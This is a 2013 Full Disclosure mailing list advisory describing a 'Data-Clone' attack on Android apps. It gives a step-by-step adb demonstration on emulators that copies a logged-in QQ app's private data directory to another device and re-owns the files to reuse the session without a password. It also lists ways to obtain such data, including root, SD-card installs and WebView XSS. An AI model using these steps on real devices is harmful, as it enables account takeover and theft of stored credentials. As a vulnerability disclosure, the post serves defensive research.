Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

"Data-Clone" -- a new way to attack android apps
From: IEhrepus <5up3rh3i () gmail com>
Date: Sun, 17 Mar 2013 18:09:09 +0800

"Data-Clone" -- a new way to attack android apps

Author: SuperHei () www knownsec com [Email:5up3rh3i#gmail.com]
Release Date: 2013/03/16
References: http://www.80vul.com/android/data-clone.txt
Chinese Version:
http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/

--[ I - Introduction

This is a new way to attack android apps t,and i call it "Data-Clone
Attack". it can bypass password authentication ,when user login the
app and set "remember password"(some apps is define).


--[ II - Description

let us use a demo to illustrat it , This is a test procedure:

1. open two emulator.

adb devices
List of devices attached
emulator-5554   device
emulator-5556   device

both devices install
"com.tencent.mobileqq"(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse,
you also can use other applications to test.

2. login the app on "emulator-5554" and make sure you choose the
"remember password".

then pull the app data  to your PC

adb -s emulator-5554 pull  /data/data/com.tencent.mobileqq/ d:\\aab
pull: building file list...
pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db ->
d:\\aab/databases/qcenter.Db
pull: /data/data/com.tencent.mobileqq/databases/*************.db ->
d:\\aab/databases/*************.db
pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml ->
d:\\aab/shared_prefs/only.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml ->
d:\\aab/shared_prefs/share.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
-> d:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml ->
d:\\aab/shared_prefs/mobileQQ.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml
-> d:\\aab/shared_prefs/*************.xml
pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\\aab/files/ADPic/457
pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml ->
d:\\aab/files/Skin/skinmain.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png ->
d:\\aab/files/Skin/tab_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml ->
d:\\aab/files/Skin/thumbnail_skin.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png ->
d:\\aab/files/Skin/title_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat ->
d:\\aab/files/sc/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat ->
d:\\aab/files/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/runningApp ->
d:\\aab/files/runningApp
pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\\aab/lib/libamrnb.so
pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so ->
d:\\aab/lib/libaudiohelper.so
pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so ->
d:\\aab/lib/libcodecwrapper.so
pull: /data/data/com.tencent.mobileqq/lib/libCommon.so ->
d:\\aab/lib/libCommon.so
pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\\aab/lib/liblbs.so
pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so ->
d:\\aab/lib/libmsfboot.so
pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so ->
d:\\aab/lib/libsnapcore.so
pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so ->
d:\\aab/lib/libVideoCtrl.so
23 files pulled. 0 files skipped.
88 KB/s (4431172 bytes in 49.011s)

3. push the data to "emulator-5556"

adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/
push: D:\\aab/databases/qcenter.Db ->
/data/data/com.tencent.mobileqq/databases/qcenter.Db
push: D:\\aab/databases/*************.db ->
/data/data/com.tencent.mobileqq/databases/*************.db
push: D:\\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457
push: D:\\aab/files/sc/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat
push: D:\\aab/files/Skin/title_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png
push: D:\\aab/files/Skin/thumbnail_skin.xml ->
/data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml
push: D:\\aab/files/Skin/tab_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png
push: D:\\aab/files/Skin/skinmain.xml ->
/data/data/com.tencent.mobileqq/files/Skin/skinmain.xml
push: D:\\aab/files/runningApp ->
/data/data/com.tencent.mobileqq/files/runningApp
push: D:\\aab/files/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/ConfigStore2.dat
push: D:\\aab/lib/libVideoCtrl.so ->
/data/data/com.tencent.mobileqq/lib/libVideoCtrl.so
push: D:\\aab/lib/libsnapcore.so ->
/data/data/com.tencent.mobileqq/lib/libsnapcore.so
push: D:\\aab/lib/libmsfboot.so ->
/data/data/com.tencent.mobileqq/lib/libmsfboot.so
push: D:\\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so
push: D:\\aab/lib/libCommon.so ->
/data/data/com.tencent.mobileqq/lib/libCommon.so
push: D:\\aab/lib/libcodecwrapper.so ->
/data/data/com.tencent.mobileqq/lib/libcodecwrapper.so
push: D:\\aab/lib/libaudiohelper.so ->
/data/data/com.tencent.mobileqq/lib/libaudiohelper.so
push: D:\\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so
push: D:\\aab/shared_prefs/share.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/share.xml
push: D:\\aab/shared_prefs/only.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/only.xml
push: D:\\aab/shared_prefs/mobileQQ.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml
push: D:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
push: D:\\aab/shared_prefs/*************.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/*************.xml
23 files pushed. 0 files skipped.
69 KB/s (4431172 bytes in 62.108s)

4.  adb-shell to "emulator-5556"

adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1    app_1             2012-09-24 02:43 com.android.htmlviewer
....
drwxr-x--x app_35   app_35            2012-12-06 07:17 com.tencent.mobileqq

and get the  com.tencent.mobileqq owner is “app_35”。

Because push the data is ROOT :

# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root     root              2012-12-06 07:17 shared_prefs
drwxrwxr-x root     root              2012-12-06 07:16 databases
drwxrwx--x app_35   app_35            2012-12-06 07:10 cache
drwxrwx--x app_35   app_35            2012-12-06 07:16 files
drwxr-xr-x system   system            2012-12-06 07:17 lib

so we need to chown :

# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35   root              2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35   root              2012-12-06 07:16 databases
drwxrwx--x app_35   app_35            2012-12-06 07:10 cache
drwxrwx--x app_35   app_35            2012-12-06 07:16 files
drwxr-xr-x app_35   system            2012-12-06 07:17 lib

5.open the app on "emulator-5556", and u have login the
com.tencent.mobileqq on  "emulator-5556".

--[ III - How to exploit

"How to get the contents of data" is key to the completion of the
attack. some like this:

1. Already have super privileges

under the root shell like the demo,u can bypass password
authentication used "Data-Clone Attack".

2. apps install on SDcard

the others have read  permissions to obtain the app's data.

3. Cross-site scripting on android

app + webview + xss(or webkit xcs vul) = "Data-Clone"

On older version of android , android app's xss or webkit xcs  vul can
read the loacl file's contents :
http://www.80vul.com/android/android-0days.txt

So the app's webview have the file read permissions to the app's data.
when a app user visit a URL link,the data will Be cloned。

--[ IV - Disclosure Timeline

2012/03/   - Found this
2012/12/10 - Report it to security () android com

......For a long time has passed......

2013/03/16 - security () android com do not have any response
(maybe,because Google was not andriod's biological mother)
2013/03/16 -Public Disclosure


hitest
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]